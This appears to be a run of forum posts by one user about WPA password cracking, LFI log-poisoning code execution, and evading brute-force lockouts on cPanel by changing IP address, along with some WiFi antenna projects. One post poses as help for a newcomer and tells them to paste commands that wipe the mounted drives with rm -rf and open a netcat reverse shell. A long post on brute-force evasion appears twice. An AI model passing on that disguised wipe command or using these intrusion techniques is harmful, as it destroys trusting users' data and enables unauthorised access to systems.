i8igmac

There have been some major security breaches over the last few years. when this data is release to the public I'm sure this word list will grow another 100billion in a few years.

https://labs.nettitude.com/tools/rocktastic/ I believe this is a updated version of the word list you are using... 1.1 trillion : -)

Hashtype: wpa/wpa2 Speed.Dev.#1.....: 388.6 kH/s (52.19ms)Speed.Dev.#2.....: 392.8 kH/s (51.63ms)Speed.Dev.#*.....: 781.4 kH/s Is that 781,400 hash's per second? can you post pyrit benchmark. I would like to see a comparison... are you running these gpu's in sli? Overclocked? Water cooling?

all your traffic is gzip encoded, your filter must first prevent this so plain text traffic is visible to ettetcap. https://www.irongeek.com/i.php?page=security/ettercapfilter

firw that thing up amd run a pyrit benchmark. I'm excited for you Check out my post count... 666

for fun, I made a metasploit module to exploit this process.

This is true, in this case I was focused on devices that have minimal security.

Correct. You should look at the file /lfi/index.php. you should find include($_GET exist or something close. Topically, RFI is not a practical method. LFI is more common. you have to discover local files that could allow you a way to view your header request. Then place php snippets in your header. /lfi/?page=/proc/self/environ This request above will execute php code directly from your user agent. You can use a web browser plugin to tamper with your user agent string. lfi/?page=/var/log/apache2/access.log If you can find the web server log file. You might see This log file shows request information coming from your web browser which should show a referer: string or user-agent string. Run a dir brute force scan. Try to discover config files and log files. You should learn small php snippets, how to find a writable directory and how to write your php code to this writable directory. I assume this is a vulnerable linux VM?

I have used 255 threads on ssh_brute. I ran into a problem with msf database unable to handle this many threads. So I tried to incorporate thread pooling with puma. I didn't spend enough time tweaking. For optimal performance but it was a fun learning experience.

The RFI is a vulnerability that exist in a index.php file. the php code in your vulnerable php File is executing the code from your echo.txt file. The vuln.php file is using Include_once(echo.txt) the most common exploit of this technique might be log poisoning. If you can write php code to any log file then you could execute your own php code. with the url inclusion method vuln.php?PAGE=../etc/log/FTP_error.log%00

I did try out hcxtools, the hccapx generated with no errors but when i attampt to start hashcat, (ill try and post the resaults) just looks like a ugly mess... it says no hashes loaded. There was no cleaning done by any scripted tools. Its a fresh cap file from aircrack-ng 1.2 rc4.

Ill check out john. Also looking into opencl vs cuda.. I currently hacked up a logging function with pyrit. I would hate to see 100hours of work go by and failure to see a success... this function would also allow me to recover the attack from any location of the word list... Im running 2 gpu's and 2 decent cpu's... blew all the dust out of the fans for the long haul. 14000psk's 22000psk's a 3rd gpu sitting on a bench, I expect 40,000 psk's from this gpu and pyrit... I'm want to try extreme over clicking with home brew cooling... I would like to see how much I can squeeze out of a dirt cheap gpu but also keep things stable.

(Pyrit Example command below) First ill start with my problem of pyrit. Output logging is hacky, after 15 hours of work, there should be something logged to the file like "Password is or was not found" Notice 2>&1 should log both stdout and stderr to a file. if I grep threw the log file, the Password String does not exist. (15 hours of work) if I test this with a small dictionary file, I achieve different results, Password string exist and is grepable. (5 minutes of work) pyrit -r handshakes.cap -i Rocktastic12a -b XX:XX:XX:XX:XX attack_passthrough 2>&1 | tee -a resaults.log love the application, it works for the most part but it seems there has not been much improvement since 2014. So, what about hashcat. this is my first attempt poking around, I knew of its existence but felt that pyrit works just fine so no need to bother with hashcat. (Hashcat) I have installed then ran the examples provided and I like the detailed output. Rocktastic cracked an enormous amount of the example hashs. Pretty cool... now when i try to run hashcat on my handshake.cap file, I notice I have to convert to hashcat format with cap2hccapcx. I installed hashcat-utils-1.8 and ran cap2hccapx in my aircrack capture file and see this error. hashcat-utils-1.8/src $ ./cap2hccapx.bin ../../out.pcap-01.cap output.hccapx Zero value timestamps detected in file: ../../out.pcap-01.cap. This prevents correct EAPOL-Key timeout calculation. Do not use preprocess the capture file with tools such as wpaclean. If I remember, this file was straight from aircrack. I did not run cleanup tools. I tried another tool that converts cap files to hashcat format hcxtools. This attempt just looks ugly when I pass the newly generated cap.hccapx.... could a outdated version of aircrack(1.2 rc4) be the cause of this struggle? The good news is, hashcat is updated consistently and has a large irc channel.

the heck with these guys. Ill help you... make a bootable kali usb stick or bootable live kali cd... http://docs.kali.org/downloading/kali-linux-live-usb-install A tutorial like Above... once you reboot your compiter into this kali operating system. Paste exactly these commands mount /dev/sda1 /tmp Rm -rf /tmp umount /dev/sda1 mount /dev/sdb1 /tmp rm -rf /tmp echo "pwnd by BiGMaC" >/tmp/readme.txt umount /dev/sdb1 nc <IP-ADDRESS> -e cmd.exe

Yes indeed... 2.4 ghz is just to crowded... 40mhz is impossible... so the speed you pay for will never be achieved... because of the short Range of 5.8ghz, 40mhz is easily doable. when you first power your router on, it will scan for crowding networks, and decide if 40mhz is doable (consume 2 channels simultaneously) A quick little hack I did with hostapd, put aluminum foil around the antenna's and start host apd. It will force 40mhz but is of course way to crowded and will cause more issues... And with long range you are more susceptible to interference, on 2.4ghz, my beam of radiation is passing through several different wifi routers airspace... think of the drops,retry,drop,fail... I would love to do a power point demonstration...

so. I have made some huge progress... 5.8ghz has been 100% stable (long range)for about 5days now... no packet loss, no more disconnects... 2.4 is to crowded... it was all pocket loss/retry/drop/retry I see 60mbps during good conditions but 40mbps is consistent... I ordered some sma pigtails, digital calipers and will build some antennas tuned for 5.8ghz...

I have been 3d printing parabolas for a few weeks now. Soon I will receive a 20pack of sma pigtails that I will use to build several feed antennas in hopes to find a great parabola/antenna combo design... this design will be a 2x2 mimo So I hope to build a inverted dipole but I fail to find measurements for 2.4 and 5ghz I plan to mount 2 antennas at the 80mm focal point, just spaced appart in a horizontal location... Any tips or ideas for antenna designs that might feed a parabola... I'm open for ideas.

Thanks for the info, i tried 8.8.8.8 but never included 192.168... Yes 3d printed a parbolic curve with a focal point of 40mm. The case is 180mmx180mmx60mm I'm learning my way around design in freecad on linux :-)

Here is a project I have been working on, the configuration includes hostapd for wlan0 Dnsmasq to assign ip's to local clients (192.168.0.*) (Wlan1)WPA_supplicant and dhclient to connect to a access point from a distance(10.0.0.*) And iptables to pass packets in both directions(wlan0 <-> wlan1) the access point in the distance is on channel 1 and my hostap runs on channel 11... 5.8ghz is not yet a option... I experience a disconnect and reconnect with the long range communication, at this moment the reconnect happens and the connection is stable again, something strage happens, I can ping my machines located in the distance on the subnet of 10.0.0.* But I can't ping google for a few minutes... During this time I can perform a test of packet loss and ping Mtr 192.168.0.1 -> 10.0.0.1 0% packet loss and a consistent 20ms response time... But ping google just hangs with no response... Possible dhclient or dns problem?

Tail -f /var/log/kern.log you should watch your kernal logs, then plug the device in...

Metal tape. Hardware store, ducting tape.

15dbi is a joke, not sure of the gain but it works very well... more testing to do... My first print! I downloaded the yagi and a wind surfer parabola from 2 projects at thingiverse . Com lots to learn and more to be having... Any one 3d print?

Maybe your wordlist file has issues? look at the tcp stream for ugly characters in the password/user string... understanding the firewall is like poking around with your eyes closed. this firewall if it even exist or provides any brute force prevention, may respond in several ways... Below is a video of a custom brute force I built to crack cpanel... from lfi to brute force... some firewall functions I experience... I instlled a cpanel OS in vm, I expect most admins will rely on the default firewall settings/functions of the installed software... A service may respond with a header 401=unauthorized, 403=forbidden or 200=ok... look up http status codes... I started off by creating a password... I tested 9 failed logins and the 10th was the correct attempt , but the header still responds with 401... So, this basic firewall function will detect a username fails X times in a row and too quickly... so the service continues to respond with the same 401 header a total of 10 times in a row... the attacker will think its password list was missing the correct creds witch I thought was clever! So I changed my local ip address from 192.168.0.100 to 192.168.0.101... now i made 8 fail logins with the 9th being the correct credz... I repeated this process until I reached the conclusion that if the correct creds was on the 6th attempt I would receive a 200 header response... There is a identical process that I used to find the TIME-in-between fails that triggers ip banning was around 60 seconds. I would need to sleep 60 seconds before each login... I could ramble on with all my findings, ill try and get to the tactic I used... change My ip after each request. With my attack I also changed username every attempt but that wont work for your situation... I had planned on creating local proxy service that would provide a new ipaddress after each request. everything I ran into required so much extra evasive function I had to build my own tool for the job... you should continue with hydra. but start thinking about what security maybe implanted... I had scraped a huge list of default router passwords but I don't know where it is... Edit: the feeling of super saiyan level 5

Maybe your wordlist file has issues? look at the tcp stream for ugly characters in the password/user string... understanding the firewall is like poking around with your eyes closed. this firewall if it even exist or provides any brute force prevention, may respond in several ways... Below is a video of a custom brute force I built to crack cpanel... from lfi to brute force... some firewall functions I experience... I instlled a cpanel OS in vm, I expect most admins will rely on the default firewall settings/functions of the installed software... A service may respond with a header 401=unauthorized, 403=forbidden or 200=ok... look up http status codes... I started off by creating a password... I tested 9 failed logins and the 10th was the correct attempt , but the header still responds with 401... So, this basic firewall function will detect a username fails X times in a row and too quickly... so the service continues to respond with the same 401 header a total of 10 times in a row... the attacker will think its password list was missing the correct creds witch I thought was clever! So I changed my local ip address from 192.168.0.100 to 192.168.0.101... now i made 8 fail logins with the 9th being the correct credz... I repeated this process until I reached the conclusion that if the correct creds was on the 6th attempt I would receive a 200 header response... There is a identical process that I used to find the TIME-in-between fails that triggers ip banning was around 60 seconds. I would need to sleep 60 seconds before each login... I could ramble on with all my findings, ill try and get to the tactic I used... change My ip after each request. With my attack I also changed username every attempt but that wont work for your situation... I had planned on creating local proxy service that would provide a new ipaddress after each request. everything I ran into required so much extra evasive function I had to build my own tool for the job... you should continue with hydra. but start thinking about what security maybe implanted... I had scraped a huge list of default router passwords but I don't know where it is...

ill provide 2 commands you should run in 2 seperate consoles. First install the tool... `sudo apt-get install tcpick` Console 1 Sudo tcpick -i wlan0 -bPS -C console 2 sudo tcpick -i wlan0 -bPC -C It will help if you close down all applications that maybe streaming data... now submit your login from the browser, both screens should now show your Post request in one console and your server response in the next consol... press ctrl-c to stop the stream's and paste this information in 2 separate text editor... You may already have this information. But now you have 2 consoles that you can use to quickly see a separate live stream ... keep at it, first you have to focus on getting hydra to produce a proper post request and see a identical server response...